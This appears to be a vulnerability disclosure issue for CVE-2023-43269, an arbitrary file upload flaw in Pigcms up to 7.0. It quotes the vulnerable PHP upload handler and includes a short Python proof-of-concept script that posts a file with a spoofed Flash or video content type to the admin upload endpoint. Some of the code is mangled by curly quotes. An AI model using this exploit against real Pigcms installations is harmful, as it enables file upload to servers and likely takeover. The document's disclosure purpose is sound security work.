Headline
CVE-2023-43269: Pigcms vulnerability testing · Issue #1 · pwnero/vul
pigcms up to 7.0 was discovered to contain an arbitrary file upload vulnerability.
Product Name:
Pigcms
Affect version
<=7.0
CVE ID:
CVE-2023-43269
Vulnerability Type
Arbitrary File Upload
Description
1.Root Cause
In the/cms/manage/modules/manage/background.php file, navigate to the action_flashUpload function,
which becomes the key to triggering vulnerabilities, has two characteristics of successfully uploading a file.
One is when the value of name is "filepath", and the other is when the value of content type is in flash format.
When both conditions are met, successful uploading can be achieved. The file suffix is not filtered and can be uploaded arbitrarily.
The uploaded suffix name is determined by the file name suffix of filename
public function action_flashUpload(){ $rt=0; $filePath=’’; if (isset($_FILES[‘filePath’])){ $flash=$_FILES[‘filePath’]; if ($flash[‘type’]!=’application/x-shockwave-flash’&&$flash[‘type’]!=’application/octet-stream’&&$flash[‘type’]!=’video/x-flv’){ echo '您上传的不是flash:’.$flash[‘type’]; }elseif ($flash[‘size’]>50000000) { echo '您上传的文件不能超过50M’; }else { $filename=$flash[‘name’]; $nameInfos=explode('.’,$filename); $nameInfosCount=count($nameInfos); $subfix=$nameInfos[$nameInfosCount-1]; $time=SYS_TIME; $rand=randStr(4); $year=date('Y’,$time); $month=date('m’,$time); $day=date('d’,$time); $pathInfo=upFileFolders($time); $dstFolder=$pathInfo[‘path’]; $abspath=$dstFolder.$time.$rand.’.’.$subfix; $location=MAIN_URL_ROOT.’/upload/images/’.$year.’/’.$month.’/’.$day.’/’.$time.$rand.’.’.$subfix; move_uploaded_file($flash[‘tmp_name’],$abspath); //delete the temporary file echo $location; } }else { echo '您上传的不是flash’; } }
Two files need to be prepared to exploit this vulnerability, one is test.txt (any suffix can be uploaded), which can be stored in the same directory as POC and run POC
POC:
import requests def test_url(url): exp="/cms/manage/admin.php?m=manage&c=background&a=action_flashUpload" files = {’filePath’: ('report.txt’, open('test.txt’, ‘rb’), 'video/x-flv’, {’Expires’: '0’})} re_q= requests.post(url+exp,files=files,allow_redirects=False) if re_q.status_code==302: print(re_q.text) test_url(goal)
Impact
Causing arbitrary file upload